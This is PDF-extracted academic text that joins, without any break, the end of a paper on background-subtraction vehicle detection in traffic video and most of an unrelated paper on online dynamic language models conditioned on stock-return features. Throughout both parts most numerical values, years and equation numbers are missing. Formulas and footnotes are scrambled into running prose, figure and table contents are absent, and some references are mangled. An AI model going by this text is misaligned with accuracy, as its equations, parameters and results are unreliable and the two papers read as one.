where avg_k is the background model established when the system acquires frame k, n is the number of averaged frames, and f_k, f_(k−1), …, f_(k−n+1) are the consecutive frames of the sequence. the statistical average method is simple and fast, but it easily causes noise accumulation and mixing. this method is more suitable for scenes with a small number of moving objects, where the background is visible most of the time. when there are a large number of moving objects, especially when they are moving slowly, the estimated background will deviate significantly.

b. gaussian distribution background model
the gaussian distribution background model was first proposed by n. friedman et al. and is divided into the single gaussian distribution and mixed gaussian distribution background models. the single gaussian model regards the change in the gray value of each pixel in the background image as a gaussian random process and establishes a gaussian model for each pixel in the image; the background image is obtained by continuously updating these gaussian models. the mixed gaussian model uses k (typically ~ ) gaussian components to characterize the features of each pixel in the image. after a new image is acquired, the mixed gaussian model is updated, and each pixel in the current image is matched against its gaussian mixture model to determine whether it belongs to the background or the foreground. this section focuses on the mixed gaussian background modeling method. this modeling method uses statistical information, such as the probability density of a large number of sample values collected over a long time, to represent the background, and uses a statistical criterion (such as the σ principle) to judge the target pixels. this method can model complex dynamic backgrounds, at the cost of a large amount of computation. suppose that any pixel (x, y) in the background obeys a model composed of k gaussian distributions, as shown in equation (2):

p(i_(x,y)) = Σ_(j=1..k) ω_(x,y,j) · η(i_(x,y), μ_(x,y,j), σ_(x,y,j))    (2)

where η(i(x,y), μ(x,y,j), σ(x,y,j)) is the j-th gaussian probability density, with mean μ(x,y,j) and variance σ(x,y,j), and ω_(x,y,j) is the weight of the j-th gaussian distribution. the pixel value observed at the current moment is compared with the current k gaussian distribution functions in descending order of weight to obtain the best match. if there is no match, the pixel is a foreground point; otherwise it is a background point. the gaussian distribution background model involves a large amount of calculation, many stored parameters, and a long running time, which is not conducive to practical application.
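as a concrete illustration of the statistical average model of section ii.a, the following is a minimal python/numpy sketch of the mean background and the background difference; the frame source, the number of averaged frames, and the threshold value are illustrative assumptions, not settings taken from this paper.

```python
import numpy as np

def mean_background(frames):
    """statistical-average background model (section ii.a):
    avg_k = (f_k + f_(k-1) + ... + f_(k-n+1)) / n."""
    stack = np.stack([np.asarray(f, dtype=np.float64) for f in frames], axis=0)
    return stack.mean(axis=0)

def background_difference(frame, background, threshold):
    """background difference: foreground mask is 1 where the absolute
    gray-level difference from the background exceeds the threshold."""
    diff = np.abs(np.asarray(frame, dtype=np.float64) - background)
    return (diff > threshold).astype(np.uint8)

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    frames = [rng.integers(0, 256, size=(240, 320)) for _ in range(25)]
    bg = mean_background(frames)
    mask = background_difference(frames[-1], bg, threshold=30)
    print(int(mask.sum()), "foreground pixels")
```

for the mixture-of-gaussians model of section ii.b, ready-made implementations exist (e.g., opencv's cv2.createBackgroundSubtractorMOG2), so it is usually not re-implemented by hand.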
iii. improved background modeling method
this paper proposes an adaptive background update model based on the inter-frame difference method. this method uses the background of the current frame and the background of the previous frame in the video sequence to perform a weighted average to update the background. the specific method is given by equations (3) and (4):

diff(x, y, t) = | i(x, y, t) − b(x, y, t) |    (3)

bom(x, y, t) = 1 if diff(x, y, t) > th, 0 otherwise    (4)

where i(x, y, t) and b(x, y, t) are the current frame containing the moving object at time t and the current background image; th is a threshold determined from the histogram of the difference image, using the gray level corresponding to a fraction of the maximum peak to its right. equation (5) obtains the motion template stencil(x, y, t) at time t from two adjacent difference images; it is used as a gating factor to determine which pixels of the current frame are used to update the current background. equation (6) then gives the instantaneous background, and the background is updated as the weighted average of the instantaneous background and the current background, as shown in equation (7):

stencil(x, y, t) = bom(x, y, t) & bom(x, y, t − 1)    (5)

b_temp(x, y, t) = stencil(x, y, t) · b(x, y, t − 1) + (1 − stencil(x, y, t)) · i(x, y, t)    (6)

b(x, y, t) = α · b_temp(x, y, t) + (1 − α) · b(x, y, t − 1)    (7)

here α is the update coefficient; its value is positively correlated with the update speed. the larger the α value, the faster the update, and changes in the external lighting can be captured in time so that the current background is closer to the external conditions of the current frame. the smaller the value, the slower the update, and the acquired current background will show some deviation. after the background image is extracted, the current motion area is segmented using the background difference method. using the threshold parameter in expression (8), the image is binarized and segmented to obtain the foreground binary image:

d(x, y, t) = 1 if diff(x, y, t) > threshold, 0 otherwise    (8)

the threshold in the formula should be properly selected, based on the experimental results, to filter out the residual background.
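to make the update rule of section iii concrete, here is a minimal numpy sketch of equations (3)–(8); the parameter values (th, α, threshold) and the frame source are illustrative assumptions rather than the settings used in the experiments.

```python
import numpy as np

def update_background(frame, prev_bom, background, th, alpha):
    """adaptive background update based on the inter-frame difference
    (section iii, equations (3)-(7)); returns the new background and
    the current binary motion map bom."""
    frame = np.asarray(frame, dtype=np.float64)
    diff = np.abs(frame - background)                     # eq. (3)
    bom = (diff > th).astype(np.float64)                  # eq. (4)
    stencil = bom * prev_bom                              # eq. (5): logical AND
    # eq. (6): keep the old background where motion is detected,
    # take the current frame pixel where it is not
    b_temp = stencil * background + (1.0 - stencil) * frame
    new_background = alpha * b_temp + (1.0 - alpha) * background   # eq. (7)
    return new_background, bom

def segment_foreground(frame, background, threshold):
    """eq. (8): binarize the background difference to obtain the foreground image."""
    diff = np.abs(np.asarray(frame, dtype=np.float64) - background)
    return (diff > threshold).astype(np.uint8)

if __name__ == "__main__":
    rng = np.random.default_rng(1)
    background = rng.integers(0, 256, size=(240, 320)).astype(np.float64)
    prev_bom = np.zeros_like(background)
    frame = background
    for _ in range(10):
        frame = rng.integers(0, 256, size=(240, 320))
        background, prev_bom = update_background(frame, prev_bom, background,
                                                 th=25, alpha=0.05)
    fg = segment_foreground(frame, background, threshold=30)
    print(float(fg.mean()))
```

morphological opening and closing (e.g., scipy.ndimage.binary_opening and binary_closing) can then be applied to the resulting mask to remove noise and fill voids, as in the detection flow described next.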
iv. experimental testing
following the flow of the vehicle detection algorithm, the processing pipeline is: original video frame → background update and extraction → motion region segmentation → conversion of the frame image to grayscale → binarization → morphological processing → detection result, completing the detection test.

a. comparison of experimental results
using the statistical average method, the mixed gaussian model, and the method proposed in this paper, background models are built from the background images of a segment of road traffic surveillance video. the video resolution is * , the frame rate is fps, and the duration is seconds. the experimental results are shown in fig. 1 below.

figure 1. comparison of experimental results with the three methods. panels show the original image frame (a) and, for the statistical average method (b), the mixed gaussian method (c), and this article's algorithm (d): the resulting background frame image, the background and frame image difference processing, the binary operation, the open operation, and the close operation.

it can be seen that, in the background frame extraction process, the background extracted by the statistical average method [fig. (b- )] is blurred and affected by the shake of the video camera, and its effect is the worst. the parameters of the mixed gaussian model are set as follows: the number of pixel models is , the initial variance is , and the learning rate of the model weights is α = . , t = . ; the resulting background [fig. (c- )] is clearer, but the background extracted at the lower left corner of the frame is still somewhat blurred. the corresponding parameter settings of this algorithm are: th = , α = . , threshold = . the background [fig. (d- )] obtained by the method proposed in this paper is of good quality and closer to the real background. finally, after the difference, binarization, and morphological processing, the final images are obtained. the statistical average method [fig. (b- )] is noisy, and the extraction result is not clear. the result obtained with the gaussian method [fig. (c- )] works well, but there is still noise. the result obtained with this algorithm [fig. (d- )] has the best effect: the noise is very small, the extracted vehicle is clearer, and its connectivity is better.

b. comparison of algorithm performance
the final conclusion of the comparison is drawn not only from the detection results but also from the performance side. table i compares the performance of the three methods, including the time used for the entire detection process, the memory footprint, and the cpu usage. it can be seen that, compared with the other two methods, the algorithm proposed in this paper consumes less time, uses less memory, and has a lower cpu occupancy rate.

table i. comparison of the performance of the three modeling methods (columns: background model; time consumed in seconds; average memory size in mb; average cpu usage in %; rows: statistical average, gaussian distribution, method of this article).

v. conclusion
this paper focuses on the vehicle detection method based on background difference in the intelligent traffic field and proposes a background modeling method based on an adaptive inter-frame difference. experiments were designed to compare it with the commonly used averaging method and the gaussian distribution model method, comparing the background images obtained by the three modeling methods. at the same time, the running performance of the algorithm is analyzed in terms of time consumption, memory occupancy, and cpu occupancy, which verifies that the vehicle detection algorithm proposed in this paper can extract the background more accurately. the morphological method is used to process the difference binary image to eliminate noise, fill in voids, etc., completing the detection step. experiments demonstrate the effectiveness and real-time performance of the algorithm for video-based moving vehicle detection. however, the performance of this algorithm under complex weather conditions and complex road conditions needs to be further improved.

references
[ ] ma junqiang. research on the detection and tracking technology of moving vehicles based on video [d]. beijing university of technology, .
[ ] yu jie, li xiaojing. moving object detection based on mean background and three-frame difference [j]. journal of shaanxi university of science and technology, ( ).
[ ] zhou mingjiang, wang jiwu.
research on the detection and tracking method of moving vehicles in video sequences[j]. science and technology economic market, ( ): - . [ ] fan wenjie, zhang li. an improved method of moving vehicle detection based on background difference algorithm [j]. journal of chengdu university of information technology, , ( ): - . [ ] huang lei, yu manman. research on moving object detection based on background difference [j]. software herald, ( ): - . [ ] lu xixin. detection of moving objects based on gaussian mixture model and three-frame difference method[d]. xi'an university of technology, . [ ] federal highway administration, department of transportation, highway performance monitoring system reassessment, final report, fhwa-pl- - , : - [ ] jean serra.introduction to mathematical morphology.computer vision, graphicsand image processing, , ( ): - [ ] yananakak.effects of misdate smith predictor on stability in system with time-delay.automatically, , ( ): - . [ ] cheung s, kamath c. robust background subtraction with foreground validation for urban traffic video[j]. eurasip journal on applied signal processing, , : - . dynamic language models for streaming text dani yogatama∗ chong wang∗ bryan r. routledge† noah a. smith∗ eric p. xing∗ ∗school of computer science †tepper school of business carnegie mellon university pittsburgh, pa , usa ∗{dyogatama,chongw,nasmith,epxing}@cs.cmu.edu, †routledge@cmu.edu abstract we present a probabilistic language model that captures temporal dynamics and conditions on arbitrary non-linguistic context features. these context features serve as important indicators of language changes that are otherwise difficult to capture using text data by itself. we learn our model in an efficient online fashion that is scalable for large, streaming data. with five streaming datasets from two different genres— economics news articles and social media—we evaluate our model on the task of sequential language modeling. our model consistently outperforms competing models. introduction language models are a key component in many nlp applications, such as machine translation and ex- ploratory corpus analysis. language models are typi- cally assumed to be static—the word-given-context distributions do not change over time. examples include n-gram models (jelinek, ) and proba- bilistic topic models like latent dirichlet allocation (blei et al., ); we use the term “language model” to refer broadly to probabilistic models of text. recently, streaming datasets (e.g., social media) have attracted much interest in nlp. since such data evolve rapidly based on events in the real world, as- suming a static language model becomes unrealistic. in general, more data is seen as better, but treating all past data equally runs the risk of distracting a model with irrelevant evidence. on the other hand, cau- tiously using only the most recent data risks overfit- ting to short-term trends and missing important time- insensitive effects (blei and lafferty, ; wang et al., ). therefore, in this paper, we take steps toward methods for capturing long-range temporal dynamics in language use. our model also exploits observable context vari- ables to capture temporal variation that is otherwise difficult to capture using only text. specifically for the applications we consider, we use stock market data as exogenous evidence on which the language model depends. 
for example, when an important company's price moves suddenly, the language model should be based not on the very recent history, but should be similar to the language model for a day when a similar change happened, since people are likely to say similar things (either about that company, or about conditions relevant to the change). non-linguistic contexts such as stock price changes provide useful auxiliary information that might indicate the similarity of language models across different timesteps. we also turn to a fully online learning framework (cesa-bianchi and lugosi, ) to deal with non-stationarity and dynamics in the data that necessitate adaptation of the model to data in real time. in online learning, streaming examples are processed only when they arrive. online learning also eliminates the need to store large amounts of data in memory. strictly speaking, online learning is distinct from stochastic learning, which for language models built on massive datasets has been explored by hoffman et al. ( ) and wang et al. ( ). those techniques are still for static modeling. language modeling for streaming datasets in the context of machine translation was considered by levenberg and osborne ( ) and levenberg et al. ( ). goyal et al. ( ) introduced a streaming algorithm for large-scale language modeling by approximating n-gram frequency counts. we propose a general online learning algorithm for language modeling that draws inspiration from regret minimization in sequential predictions (cesa-bianchi and lugosi, ) and online variational algorithms (sato, ; honkela and valpola, ). to our knowledge, our model is the first to bring together temporal dynamics, conditioning on non-linguistic context, and scalable online learning suitable for streaming data and extensible to include topics and n-gram histories. the main idea of our model is independent of the choice of the base language model (e.g., unigrams, bigrams, topic models, etc.). in this paper, we focus on unigram and bigram language models in order to evaluate the basic idea on well-understood models, and to show how it can be extended to higher-order n-grams. we leave extensions to topic models for future work. we propose a novel task to evaluate our proposed language model. the task is to predict economics-related text at a given time, taking into account the changes in stock prices up to the corresponding day. this can be seen as an inverse of the setup considered by lavrenko et al. ( ), where news is assumed to influence stock prices. we evaluate our model on economics news in various languages (english, german, and french), as well as twitter data. background in this section, we first discuss the background for sequential predictions and then describe how to formulate online language modeling as sequential predictions. . sequential predictions let w1, w2, . . . , wT be a sequence of response variables, revealed one at a time. the goal is to design a good learner to predict the next response, given previous responses and additional evidence which we denote by xt ∈ R^M (at time t). throughout this paper, we use the term features for x. specifically, at each round t, the learner receives xt and makes a prediction ŵt, by choosing a parameter vector αt ∈ R^M. in this paper, we refer to α as feature coefficients.
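the sequential protocol just described can be summarized by a small driver loop. the sketch below is only illustrative: the model interface (predict/update), the feature source, and the use of the negative log likelihood as the loss (the loss the paper adopts in its problem formulation) are assumptions standing in for components defined in the following sections, not code from the paper.

```python
import math

def day_loss(word_probs, tokens):
    """negative log likelihood of one day's text under the predicted
    unigram distribution."""
    return -sum(math.log(word_probs[w]) for w in tokens)

def run_online_lm(days, model):
    """sequential prediction protocol: at each round t the learner sees the
    context features x_t, predicts a word distribution, then observes the
    day's text w_t, suffers the loss, and updates its parameters."""
    total = 0.0
    for x_t, w_t in days:                 # days yields (features, token list)
        probs = model.predict(x_t)        # distribution over the vocabulary
        total += day_loss(probs, w_t)
        model.update(x_t, w_t)            # online update after w_t is revealed
    return total
```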
there has been an enormous amount of work on online learning for sequential predictions, much of it building on convex optimization. for a sequence of loss functions ` ,` , . . . ,`t (parameterized by α), an online learning algorithm is a strategy to minimize the regret, with respect to the best fixed α∗ in hind- sight. regret guarantees assume a lipschitz con- formally, the regret is defined as regrett (α ∗) = dition on the loss function ` that can be prohibitive for complex models. see cesa-bianchi and lugosi ( ), rakhlin ( ), bubeck ( ), and shalev- shwartz ( ) for in-depth discussion and review. there has also been work on online and stochastic learning for bayesian models (sato, ; honkela and valpola, ; hoffman et al., ), based on variational inference. the goal is to approximate pos- terior distributions of latent variables when examples arrive one at a time. in this paper, we will use both kinds of techniques to learn language models for streaming datasets. . problem formulation consider an online language modeling problem, in the spirit of sequential predictions. the task is to build a language model that accurately predicts the texts generated on day t, conditioned on observ- able features up to day t, x :t. every day, after the model makes a prediction, the actual texts wt are revealed and we suffer a loss. the loss is de- fined as the negative log likelihood of the model `t = − log p(wt | α,β :t− ,x :t− ,n :t− ), where α and β :t are the model parameters and n is a back- ground distribution (details are given in § . ). we can then update the model and proceed to day t + . notice the similarity to the sequential prediction de- scribed above. importantly, this is a realistic setup for building evolving language models from large-scale streaming datasets. model . notation we index timesteps by t ∈ { , . . . ,t} and word types by v ∈ { , . . . ,v}, both are always given as subscripts. we denote vectors in boldface and use : t as a shorthand for { , , . . . ,t}. we assume words of the form {wt}tt= for wt ∈ rv , which is the vector of word frequences at timetstep t. non- linguistic context features are {xt}tt= for xt ∈ rm . the goal is to learn parameters α and β :t , which will be described in detail next. . generative story the main idea of our model is illustrated by the fol- lowing generative story for the unigram languagept t= `t(xt,αt,wt)− infα∗ pt t= `t(xt,α ∗,wt). model. (we will discuss the extension to higher-order language models later.) a graphical representation of our proposed model is given in figure . . draw feature coefficients α ∼ n( ,λi). here α is a vector in rm , where m is the dimension- ality of the feature vector. . for each timestep t: (a) observe non-linguistic context features xt. (b) draw βt ∼ n (∑t− k= δk exp(α>f(xt,xk))pt− j= δj exp(α >f(xt,xj)) βk,ϕi ) . here, βt is a vector in r v , where v is the size of the word vocabulary, ϕ is the variance parameter and δk is a fixed hyperparameter; we discuss them below. (c) for each word wt,v, draw wt,v ∼ categorical ( exp(n :t− ,v+βt,v)p j∈v exp(n :t− ,j+βt,j) ) . in the last step, βt and n are mapped to the v - dimensional simplex, forming a distribution over words. n :t− ∈ rv is a background (log) distri- bution, inspired by a similar idea in eisenstein et al. ( ). in this paper, we set n :t− ,v to be the log- frequency of v up to time t− . we can interpret β as a time-dependent deviation from the background log-frequencies that incorporates world-context. 
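to make the quantities used in the generative story of the model concrete — the background log-frequencies n, the per-day deviations β_t, the context similarity f(x_t, x_k), and the feature coefficients α — the following numpy sketch simulates the process for a toy vocabulary. the dimensions, window size, similarity function, and parameter values are illustrative assumptions, not settings from the paper.

```python
import numpy as np

rng = np.random.default_rng(0)
V, M, T, c = 50, 8, 30, 7      # vocab size, feature dim, days, window (toy values)
lam, phi = 1.0, 0.1            # prior variances (illustrative)

def softmax(z):
    z = z - z.max()
    e = np.exp(z)
    return e / e.sum()

def f_similarity(x_t, x_k):
    """a simple similarity vector: 1 where the two days' features agree in sign."""
    return (np.sign(x_t) == np.sign(x_k)).astype(float)

alpha = rng.normal(0.0, np.sqrt(lam), size=M)    # draw feature coefficients
counts = np.ones(V)                              # word counts (add-one, so log is defined)
betas, x_hist = [], []

for t in range(T):
    x_t = rng.normal(size=M)                     # observe context features x_t
    if betas:                                    # similarity-weighted mean of past betas
        past_x = x_hist[-c:]
        scores = np.array([alpha @ f_similarity(x_t, x_k) for x_k in past_x])
        mean = softmax(scores) @ np.stack(betas[-c:])
    else:
        mean = np.zeros(V)
    beta_t = rng.normal(mean, np.sqrt(phi))      # beta_t drawn around the weighted mean
    n_log_freq = np.log(counts)                  # background log-frequencies up to t-1
    word_dist = softmax(n_log_freq + beta_t)     # distribution over the vocabulary
    w_t = rng.multinomial(200, word_dist)        # the day's observed word counts
    counts += w_t
    betas.append(beta_t)
    x_hist.append(x_t)

print(word_dist[:5])
```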
this deviation comes in the form of a weighted average of earlier deviation vectors. the intuition behind the model is that the probabil- ity of a word appearing at day t depends on the back- ground log-frequencies, the deviation coefficients of the word at previous timesteps β :t− , and the sim- ilarity of current conditions of the world (based on observable features x) to previous timesteps through f(xt,xk). that is, f is a function that takes d- dimensional feature vectors at two timesteps xt and xk and returns a similarity vector f(xt,xk) ∈ rm (see § . . for an example of f that we use in our experiments). the similarity is parameterized by α, and decays over time with rate δk. in this work, we assume a fixed window size c (i.e., we consider c most recent timesteps), so that δ :t−c− = and δt−c:t− = . this allows up to cth order depen- dencies. setting δ this way allows us to bound the feature coefficients α can be also drawn from other distri- butions such as α ∼ laplace( ,λ). in online bayesian learning, it is known that forgetting inaccurate estimates from earlier timesteps is important (sato, � xtxsxrxq wq wr ws wt �t�s�r�q ↵ nrnq ns nt t figure : graphical representation of the model. the subscript indices q,r,s are shorthands for the previ- ous timesteps t − , t − , t − . only four timesteps are shown here. there are arrows from previous βt− ,βt− , . . . ,βt−c to βt, where c is the window size as described in § . . they are not shown here, for read- ability. number of past vectors β that need to be kept in memory. we set β to . although the generative story described above is for unigram language models, extensions can be made to more complex models (e.g., mixture of un- igrams, topic models, etc.) and to longer n-gram contexts. in the case of topic models, the model will be related to dynamic topic models (blei and lafferty, ) augmented by context features, and the learning procedure in § can be used to perform online learning of dynamic topic models. however, our model captures longer-range dependencies than dynamic topic models, and can condition on non- linguistic features or metadata. in the case of higher- order n-grams, one simple way is to draw more β, one for each history. for example, for a bigram model, β is in rv , rather than rv in the unigram model. we consider both unigram and bigram lan- guage models in our experiments in § . however, the main idea presented in this paper is largely indepen- dent of the base model. related work. mimno and mccallum ( ) and eisenstein et al. ( ) similarly conditioned text on ; honkela and valpola, ). since we set δ :t−c− = , at every timestep t, δk leads to forgetting older examples. observable features (e.g., author, publication venue, geography, and other document-level metadata), but conducted inference in a batch setting, thus their ap- proaches are not suitable for streaming data. it is not immediately clear how to generalize their approach to dynamic settings. algorithmically, our work comes closest to the online dynamic topic model of iwata et al. ( ), except that we also incorporate context features. learning and inference the goal of the learning procedure is to minimize the overall negative log likelihood, − log l(d) = − log ∫ dβ :tp(β :t | α,x :t )p(w :t | β :t ,n). however, this quantity is intractable. instead, we derive an upper bound for this quantity and minimize that upper bound. 
using jensen’s inequality, the vari- ational upper bound on the negative log likelihood is: − log l(d) ≤− ∫ dβ :tq(β :t | γ :t ) ( ) log p(β :t | α,x :t )p(w :t | β :t ,n) q(β :t | γ :t ) . specifically, we use mean-field variational inference where the variables in the variational distribution q are completely independent. we use gaussian distri- butions as our variational distributions for β, denoted by γ in the bound in eq. . we denote the parameters of the gaussian variational distribution for βt,v (word v at timestep t) by µt,v (mean) and σt,v (variance). figure shows the functional form of the varia- tional bound that we seek to minimize, denoted by b̂. the two main steps in the optimization of the bound are inferring βt and updating feature coefficients α. we next describe each step in detail. . learning the goal of the learning procedure is to minimize the upper bound in figure with respect to α. however, since the data arrives in an online fashion, and speed is very important for processing streaming datasets, the model needs to be updated at every timestep t (in our experiments, daily). notice that at timestep t, we only have access to x :t and w :t, and we perform learning at every timestep after the text for the current timestep wt is revealed. we do not know xt+ :t and wt+ :t . nonetheless, we want to update our model so that it can make a better prediction at t + . therefore, we can only minimize the bound until timestep t. let ck , exp(α >f(xt,xk))pt− j=t−c exp(α >f(xt,xj)) . our learning al- gorithm is a variational expectation-maximization algorithm (wainwright and jordan, ). e-step recall that we use variational inference and the variational parameters for β are µ and σ. as shown in figure , since the log-sum-exp in the last term of b is problematic, we introduce additional variational parameters ζ to simplify b and obtain b̂ (eqs. – ). the e-step deals with all the local variables µ, σ, and ζ. fixing other variables and taking the derivative of the bound b̂ w.r.t. ζt and setting it to zero, we obtain the closed-form update for ζt: ζt =∑ v∈v exp (n :t− ,v) exp ( µt,v + σt,v ) . to minimize with respect to µt and σt, we apply gradient-based methods since there are no closed- form solutions. the derivative w.r.t. µt,v is: ∂b̂ ∂µt,v = µt,v −ckµk,v ϕ −nt,v + nt ζt exp (n :t− ,v) exp ( µt,v + σt,v ) , where nt = ∑ v∈v nt,v. the derivative w.r.t. σt,v is: ∂b̂ ∂σt,v = σt,v + ϕ + nt ζt exp (n :t− ,v) exp ( µt,v + σt,v ) . although we require iterative methods in the e-step, we find it to be reasonably fast in practice. specifi- cally, we use the l-bfgs quasi-newton algorithm (liu and nocedal, ). we can further improve the bound by updating the variational parameters for timestep : t− , i.e., µ :t− and σ :t− , as well. however, this will require storing the texts from previous timesteps. addition- ally, this will complicate the m-step update described approximately . seconds/day (walltime) to learn the model on the en:na dataset on a . ghz cpu with gb memory. b =− t∑ t= eq[log p(βt | βk,α,xt)]− t∑ t= eq[log p(wt | βt,nt)]−h(q) ( ) = t∑ t=    ∑ j∈v log σt,j ϕ −eq  − ( βt − ∑t− k=t−c ckβk ) ϕ  −eq   ∑ v∈wt n :t− ,v + βt,v − log ∑ j∈v exp(n :t− ,j + βt,j)      ( ) ≤ t∑ t=    ∑ j∈v log σt,v ϕ + ( µt − ∑t− k=t−c ckµk ) ϕ + σt + ∑t− k=t−c c kσk ϕ − ∑ v∈wt  µt,v − log ζt − ζt ∑ j∈v exp (n :t− ,j) exp ( µt,j + σt,j )      + const ( ) figure : the variational bound that we seek to minimize, b. h(q) is the entropy of the variational distribution q. 
the derivation from line to line is done by replacing the probability distributions p(βt | βk,α,xt) and p(wt | βt,nt) by their respective functional forms. notice that in line we compute the expectations under the variational distributions and further bound b by introducing additional variational parameters ζ using jensen’s inequality on the log-sum-exp in the last term. we denote the new bound b̂. below. therefore, for each s < t, we choose to fix µs and σs once they are learned at timestep s. m-step in the m-step, we update the global pa- rameter α, fixing µ :t. fixing other parameters and taking the derivative of b̂ w.r.t. α, we obtain: ∂b̂ ∂α = (µt − ∑t− k=t−c ckµk)(− ∑t− k=t−c ∂ck ∂α ) ϕ + ∑t− k=t−c ckσk ∂ck ∂α ϕ , where: ∂ck ∂α =ckf(xt,xk) −ck ∑t− s=t−c f(xt,xs) exp(α >f(xt,xs))∑t− s=t−c exp(α >f(xt,xs)) . we follow the convex optimization strategy and sim- ply perform a stochastic gradient update: αt+ = αt + ηt ∂b̂ ∂αt (zinkevich, ). while the variational bound b̂ is not convex, given the local variables µ :t in our implementation, we augment α with a squared l regularization term (i.e., we assume that α is drawn from a normal distribution with mean zero and variance λ) and use the fobos algorithm (duchi and singer, ). the derivative of the regularization term is simple and is not shown here. of course, other regularizers (e.g., the l -norm, which we use for other parameters, or the l /∞-norm) can also be explored. and σ :t, optimizing α at timestep t without know- ing the future becomes a convex problem. since we do not reestimate µ :t− and σ :t− in the e-step, the choice to perform online gradient descent instead of iteratively performing batch optimization at every timestep is theoretically justified. notice that our overall learning procedure is still to minimize the variational upper bound b̂. all these choices are made to make the model suitable for learning in real time from large streaming datasets. preliminary experiments showed that performing more than one em iteration per day does not consid- erably improve performance, so in our experiments we perform one em iteration per day. to learn the parameters of the model, we rely on approximations and optimize an upper bound b̂. we have opted for this approach over alternatives (such as mcmc methods) because of our interest in the online, large-data setting. our experiments show that we are still able to learn reasonable parameter esti- mates by optimizing b̂. like online variational meth- ods for other latent-variable models such as lda (sato, ; hoffman et al., ), open questions re- main about the tightness of such approximations and the identifiability of model parameters. we note, how- as a result, our algorithm is hannan consistent w.r.t. the best fixed α (for b̂) in hindsight; i.e., the average regret goes to zero as t goes to ∞. ever, that our model does not include latent mixtures of topics and may be generally easier to estimate. prediction as described in § . , our model is evaluated by the loss suffered at every timestep, where the loss is defined as the negative log likelihood of the model on text at timestep wt. therefore, at each timestep t, we need to predict (the distribution of) wt. in order to do this, for each word v ∈ v , we simply compute the deviation means βt,v as weighted combinations of previous means, where the weights are determined by the world-context similarity encoded in x: eq[βt,v | µt,v] = t− ∑ k=t−c exp(α>f(xt,xk))∑t− j=t−c exp(α >f(xt,xj)) µk,v. 
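a minimal sketch of the prediction step: the day-t deviation mean is a softmax-weighted combination of the stored variational means from the previous c days, and the predicted word distribution follows by adding the background log-frequencies and normalizing (the operator π). the function names, the sign-agreement similarity (as used with stock returns later in the paper), and the inputs are illustrative assumptions.

```python
import numpy as np

def softmax(z):
    z = z - z.max()
    e = np.exp(z)
    return e / e.sum()

def sign_agreement(x_t, x_k):
    """similarity features used with stock returns: 1 iff the two days'
    returns have the same sign, 0 otherwise."""
    return (np.sign(x_t) == np.sign(x_k)).astype(float)

def predict_word_distribution(mu_history, x_history, x_t, alpha, n_log_freq,
                              f=sign_agreement):
    """E[beta_t] = sum_k softmax(alpha . f(x_t, x_k)) * mu_k, followed by
    pi(beta_t, n) = softmax(n + beta_t) over the vocabulary."""
    scores = np.array([alpha @ f(x_t, x_k) for x_k in x_history])
    weights = softmax(scores)                 # similarity-based weights over past days
    beta_t = weights @ np.stack(mu_history)   # expected deviation vector
    return softmax(n_log_freq + beta_t)
```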
recall that the word distribution that we use for prediction is obtained by applying the operator π that maps βt and n to the v -dimensional simplex, forming a distribution over words: π(βt,n :t− )v = exp(n :t− ,v+βt,v)p j∈v exp(n :t− ,j+βt,j) , where n :t− ,v ∈ rv is a background distribution (the log-frequency of word v observed up to time t− ). experiments in our experiments, we consider the problem of pre- dicting economy-related text appearing in news and microblogs, based on observable features that reflect current economic conditions in the world at a given time. in the following, we describe our dataset in de- tail, then show experimental results on text prediction. in all experiments, we set the window size c = (one week) or c = (two weeks), λ = |v | (v is the size of vocabulary of the dataset under consideration), and ϕ = . . dataset our data contains metadata and text corpora. the metadata is used as our features, whereas the text corpora are used for learning language models and predictions. the dataset (excluding twitter) can be downloaded at http://www.ark.cs.cmu. edu/dynamiclm. . . metadata we use end-of-day stock prices gathered from finance.yahoo.com for each stock included in the standard & poor’s index (s&p ). the index includes large (by market value) companies listed on us stock exchanges. we calculate daily (continuously compounded) returns for each stock, o: ro,t = log po,t−log po,t− , where po,t is the closing stock price. we make a simplifying assumption that text for day t is generated after po,t is observed. in general, stocks trade monday to friday (except for federal holidays and natural disasters). for days when stocks do not trade, we set ro,t = for all stocks since any price change is not observed. we transform returns into similarity values as fol- lows: f(xo,t,xo,k) = iff sign(ro,t) = sign(ro,k) and otherwise. while this limits the model by ig- noring the magnitude of price changes, it is still rea- sonable to capture the similarity between two days. there are stocks in the s&p , so xt ∈ r and f(xt,xk) ∈ r . . . text data we have five streams of text data. the first four corpora are news streams tracked through reuters. two of them are written in english, north american business report (en:na) and japanese investment news (en:jp). the remaining two are german eco- nomic news service (de, in german) and french economic news service (fr, in french). for all four of the reuters streams, we collected news data over a period of thirteen months ( days), - - to - - . see table for descriptive statistics of these datasets. numerical terms are mapped to a single word, and all letters are downcased. the last text stream comes from the deca- hose/gardenhose stream from twitter. we collected public tweets that contain ticker symbols (i.e., sym- bols that are used to denote stocks of a particular company in a stock market), preceded by the dollar for a list of companies listed in the s&p as of , see http://en.wikipedia.org/wiki/list_ of_s\% p_ _companies. this set was fixed during the time periods of all our experiments. we use the “adjusted close” on yahoo that includes interim dividend cash flows and also adjusts for “splits” (changes in the number of outstanding shares). this is done in order to avoid having to deal with hourly timesteps. in addition, intraday price data is only available through commercial data provided. note that daily stock returns are equally likely to be positive or negative and display little serial correlation. 
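The metadata preprocessing described above can be sketched as follows: continuously compounded daily returns computed from closing prices (set to zero when no price change is observed) and the sign-agreement indicator features. The prices array is hypothetical; the actual S&P constituent data is not reproduced here.

```python
import numpy as np

def daily_log_returns(prices):
    """r_{o,t} = log p_{o,t} - log p_{o,t-1}; zero where no change is observed (sketch).

    prices : (T, S) array of closing prices per day and stock, NaN on non-trading days.
    """
    logp = np.log(prices)
    r = np.diff(logp, axis=0, prepend=logp[:1])   # first day has no previous price
    return np.nan_to_num(r)                       # unobserved price change -> return of 0

def sign_agreement_features(returns, t, k):
    """f(x_{o,t}, x_{o,k}) = 1 iff sign(r_{o,t}) == sign(r_{o,k}), else 0, one entry per stock."""
    return (np.sign(returns[t]) == np.sign(returns[k])).astype(float)
```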
